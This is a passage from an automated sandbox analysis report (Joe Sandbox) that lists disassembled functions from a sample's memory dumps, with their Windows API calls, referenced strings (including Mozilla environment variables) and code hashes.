Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: strncmp
String ID: #$-$]
API String ID: 1114863663-3149169660
Opcode ID: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
Instruction ID: 1c490b0b60c0b5d90f91e160a7bf365b8f8ab346ded86ed4ccdc7e106188df17
Opcode Fuzzy Hash: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
Instruction Fuzzy Hash: 82D15774D082698BDB01CF98C18479DFBF2BF89748FA9C059D854AB292D335E986CF50

Function 6D565C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6D565D40
EnterCriticalSection.KERNEL32(6D5CF688), ref: 6D565D67
__aulldiv.LIBCMT ref: 6D565DB4
LeaveCriticalSection.KERNEL32(6D5CF688), ref: 6D565DED

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 6c71da10d02d19b553656114557ee6365639a6d20146e3cde2c71c6a9359deba
Instruction ID: 792b0d5be98ddfbc6f41e6f2c98e5cd4a1628a8389ef09256489a410c4f26d65
Opcode Fuzzy Hash: 6c71da10d02d19b553656114557ee6365639a6d20146e3cde2c71c6a9359deba
Instruction Fuzzy Hash: 9A516F71E0059A8FCF08CFA8C855BBEBBB1FB85304F16861DD861A7B61C7306945CBA0

Function 6D5A7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6D5A7250
EnterCriticalSection.KERNEL32(6D5CF688), ref: 6D5A7277
__aulldiv.LIBCMT ref: 6D5A72C4
LeaveCriticalSection.KERNEL32(6D5CF688), ref: 6D5A72F7

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 5a5a97a913adc0db2073acd6c783679332395e2e13ad823af3845c843354a45c
Instruction ID: 6406e144a768b7f5e3801b7f77a056c1b1e1858ab8c460eaa3d61c44c745adb8
Opcode Fuzzy Hash: 5a5a97a913adc0db2073acd6c783679332395e2e13ad823af3845c843354a45c
Instruction Fuzzy Hash: 9C516D71E005298FCF08CFA8C851BBEBBB1FB89300F1A862DD825A7B54C7306945CB90

Function 6D54CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6D54CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6D54CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6D54CF4E

Strings

0, xrefs: 6D54CF30

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 35df7e3b82d44f93beeed1b2efa02cf4d40694bc2e3e820a26f33c2fc149f55d
Instruction ID: 4c3f97c9c0ce8ce1c4e21300fc6cee79390a8fe35e1e3f6c63f14b460083936b
Opcode Fuzzy Hash: 35df7e3b82d44f93beeed1b2efa02cf4d40694bc2e3e820a26f33c2fc149f55d
Instruction Fuzzy Hash: 96510175A042168FCB09CF18C890AAABBB5EF99300F19C59DD8595F352D731ED46CBE0

Function 6D557E90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D557EA7

Part of subcall function 6D55CAB0: EnterCriticalSection.KERNEL32(?), ref: 6D55CB49
Part of subcall function 6D55CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6D55CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6D557EC4
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D557F4D

Strings

d, xrefs: 6D557F89

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpystrlenstrncpy
String ID: d
API String ID: 2815073212-2564639436
Opcode ID: 43d8544b1420475597653f4e6e0b3c6efc4e2fcda2599512f1aec5973e58f6fc
Instruction ID: 5d9f351c6e52234e10c211a2b76fecc3923531d4ef43e59c0ed12c5a6f19f426
Opcode Fuzzy Hash: 43d8544b1420475597653f4e6e0b3c6efc4e2fcda2599512f1aec5973e58f6fc
Instruction Fuzzy Hash: CD311861D0478897EF05DB38CC14ABEB778EFD5208F069629DD4997A12FB31A9D4C390

Function 6D583DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6D54F20E,?), ref: 6D583DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6D54F20E,00000000,?), ref: 6D583DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D583E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6D583E0E

Part of subcall function 6D57CC00: GetCurrentProcess.KERNEL32(?,?,6D5431A7), ref: 6D57CC0D
Part of subcall function 6D57CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6D5431A7), ref: 6D57CC16

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: b23c9092e09e89cb6e559cc8aa7946f703dc34c2b6fbf2044dd7cb7334e665df
Instruction ID: bea37351714775e4dbe138c1ee02f66c4e7034b554b9999dac03f68b6a6b81c3
Opcode Fuzzy Hash: b23c9092e09e89cb6e559cc8aa7946f703dc34c2b6fbf2044dd7cb7334e665df
Instruction Fuzzy Hash: 85F012715402087BEB049B54DC41EBB376DDB86625F060024FE0857B41D735BD5586F7

Function 61EAF6D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 61EAF6F5
__dllonexit.MSVCRT ref: 61EAF733
_unlock.MSVCRT ref: 61EAF763
_onexit.MSVCRT ref: 61EAF777

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
Instruction ID: d8116788f2c50d2f41c70b1de34e9b41b7999a481f31fa547576aa82505b99b8
Opcode Fuzzy Hash: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
Instruction Fuzzy Hash: 7D1155B5A197418FCB40EF74D48455EBBE0AB89254F618D2EE4E5CB350E738D5848B82

Function 6D5AA7A0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CF770,-00000001,?,6D5BE330,?,6D56BDF7), ref: 6D5AA7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6D56BDF7), ref: 6D5AA7C2
LeaveCriticalSection.KERNEL32(6D5CF770), ref: 6D5AA80A

Strings

accelerator.dll, xrefs: 6D5AA7BF

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeavestrcmp
String ID: accelerator.dll
API String ID: 2465784920-2426294810
Opcode ID: 484f4a43558419882952130a1d65576687ecf50f361eb8b563eac7c80b73b89b
Instruction ID: 9e6d29ca11487f28e8452875f0d283e3ac428994143a8f8647efba2d0cbafe07
Opcode Fuzzy Hash: 484f4a43558419882952130a1d65576687ecf50f361eb8b563eac7c80b73b89b
Instruction Fuzzy Hash: F5018F706102149FDF08CF59D884D2677F8FB89314706806EE9098BA02DF70DC00CBA1

Function 6D5A5850 Relevance: 6.0, APIs: 4, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6D5A586C
CloseHandle.KERNEL32 ref: 6D5A5878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6D5A5898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6D5A58C9

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: d319fad34d4970b8c5a8ba808581a4b6066748951eb9c0cdbb3cce0cdb4a3180
Instruction ID: faba6fe7c303f9ffc721f6b818b134ea0b5628d90c48c73527d76a4a33fb5f5e
Opcode Fuzzy Hash: d319fad34d4970b8c5a8ba808581a4b6066748951eb9c0cdbb3cce0cdb4a3180
Instruction Fuzzy Hash: F901A47550AA12ABDF009F29DC08B2A7BB8FB83325767417EE61AD6E10D7319811CF81

Function 6D597620 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6D5974D7,6D5A15FC,?,?,?), ref: 6D597644
GetCurrentThreadId.KERNEL32 ref: 6D59765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6D5974D7,6D5A15FC,?,?,?), ref: 6D597663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6D5974D7,6D5A15FC,?,?,?), ref: 6D597677

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariable
String ID:
API String ID: 3883352875-0
Opcode ID: 3ca89dd129f4a9baadac9856945bf994341946cd77ddefbd024d27acaa48d8f2
Instruction ID: 10ebb26cffee1d5fe5049d0eb7227a21df67f9a89249c53bdd60e6c69dff4d00
Opcode Fuzzy Hash: 3ca89dd129f4a9baadac9856945bf994341946cd77ddefbd024d27acaa48d8f2
Instruction Fuzzy Hash: 22F0C276D10B85ABDB009F61C888776BB78FFEA759F12431AF90443A01E7B1A5D08BD1

Function 6D586590 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6D57FA80: GetCurrentThreadId.KERNEL32 ref: 6D57FA8D
Part of subcall function 6D57FA80: AcquireSRWLockExclusive.KERNEL32(6D5CF448), ref: 6D57FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6D586727

Part of subcall function 6D594290: memcpy.VCRUNTIME140(?,?,6D5A2003,6D5A0AD9,?,6D5A0AD9,00000000,?,6D5A0AD9,?,00000004,?,6D5A1A62,?,6D5A2003,?), ref: 6D5942C4

Strings

data, xrefs: 6D586593
v\m, xrefs: 6D58696C

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadmemcpy
String ID: data$v\m
API String ID: 140092360-2005444238
Opcode ID: f0ca8b28f6cbdb875a10ee480a4a7316d8179c07c73f146a24173237154d9ec7
Instruction ID: 8ffedb002dc8c6e800a7de01334f1edf0d8ff88b66a9d19bc27836f74b69fbf3
Opcode Fuzzy Hash: f0ca8b28f6cbdb875a10ee480a4a7316d8179c07c73f146a24173237154d9ec7
Instruction Fuzzy Hash: 7CD1B174A183418FD728DF25C850BAFB7E5AFC5304F11892EE58A87B52EB309845CB93

Function 6D58E100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6D58E084,00000000), ref: 6D58E137

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

Part of subcall function 6D5899A0: GetCurrentThreadId.KERNEL32 ref: 6D5899C1
Part of subcall function 6D5899A0: AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D5899CE
Part of subcall function 6D5899A0: ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D5899F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6D58E13F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2848912005-3904374701
Opcode ID: 56d073e74f498f9d40de247298444370ecb42b4b377bac5f86fbf9122356710a
Instruction ID: 86d61c1e6be16ff1c0fd81edc1fd9f804e071455ea15ec3139bf4746d92db952
Opcode Fuzzy Hash: 56d073e74f498f9d40de247298444370ecb42b4b377bac5f86fbf9122356710a
Instruction Fuzzy Hash: 7D3106B1A087159FD70CDF58845036AF7F5EFD6208F15882EE94A8BA42EB718D06C793

Function 61EAFAF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 61EAFB80
VirtualProtect.KERNEL32 ref: 61EAFBC2

Strings

@, xrefs: 61EAFBAB

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: @
API String ID: 1027372294-2766056989
Opcode ID: 291e62d0b65acdb3804ba4f4353593b383c4c3d38d689e226719f6992fe71c3d
Instruction ID: d36ff6d444c1f5105915669b8fb698cf4239ff4a3251c649fd02843d9bfa6c4b
Opcode Fuzzy Hash: 291e62d0b65acdb3804ba4f4353593b383c4c3d38d689e226719f6992fe71c3d
Instruction Fuzzy Hash: C0316DB2A447018FE710DF68D99464AFBF0FB44358F55C92DD8A98B340E734E844CB92

Function 6D554730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6D5544B2,6D5CE21C,6D5CF7F8), ref: 6D55473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6D55474A

Strings

GetNtLoaderAPI, xrefs: 6D554744

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: c64e313e873a8899ab3a0ca30ff2f28e5602c7e457961390961464aa13136889
Instruction ID: 52806c197eb1eb53aa7bebfb30118c1eee853337c1951b37b52151566558ed29
Opcode Fuzzy Hash: c64e313e873a8899ab3a0ca30ff2f28e5602c7e457961390961464aa13136889
Instruction Fuzzy Hash: 430175756016159FDF05AF6AC44472D77F9FB4B311B06446EE905C7B00DB74D8128FA2

Function 6D5A6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6D5A6E22
__Init_thread_footer.LIBCMT ref: 6D5A6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6D5A6E1D

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 2a6dbb6ffa8fed481eaa1518e11fe03856c778b0eeebba72a1101b01c206628e
Instruction ID: 48763a7ff68a544aa5153c1d2593afe2ba842145db0c858d787d697c266b190c
Opcode Fuzzy Hash: 2a6dbb6ffa8fed481eaa1518e11fe03856c778b0eeebba72a1101b01c206628e
Instruction Fuzzy Hash: 42F0593104AB41CBDF088BACC850F6A3371A353214F0A116DC93A06F52C731BD8ACAD3

Function 6D559E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6D559EEF

Strings

Infinity, xrefs: 6D559EB7
NaN, xrefs: 6D559EC1

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: d71f86c35505953c84d4820ecaa266f0aee0784bb1c3cdfda8b80b275fdd3bd7
Instruction ID: f8b8f3f3f96b1a42363ecaf9cad87a16460be6dad9644f35a1818555c3604ea1
Opcode Fuzzy Hash: d71f86c35505953c84d4820ecaa266f0aee0784bb1c3cdfda8b80b275fdd3bd7
Instruction Fuzzy Hash: 06F0C2B0402A42CBDF05CF58D849B5433B1B34332AF225A1DD5050AE41F73976A6CA83

Function 6D5A5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6D5C51C8), ref: 6D5A591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6D5A592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6D5A5915

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 451c3aa417e66da831f92e1e0b8033369da4344cc20db8da6750dd0b6b5073ad
Instruction ID: 73b82b48edce8661537bf0b7c2d8a7f99aaf3ca7d818b3384f9dc2797333bfa1
Opcode Fuzzy Hash: 451c3aa417e66da831f92e1e0b8033369da4344cc20db8da6750dd0b6b5073ad
Instruction Fuzzy Hash: F2E04830104651BBDF055BA8C50CB797FF49B13B35F05854CE5A997ED1C3B56840C792

Function 6D553850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6D5CF860), ref: 6D55385C
ReleaseSRWLockExclusive.KERNEL32(6D5CF860,?), ref: 6D553871

Strings

,\m, xrefs: 6D55387A

Memory Dump Source

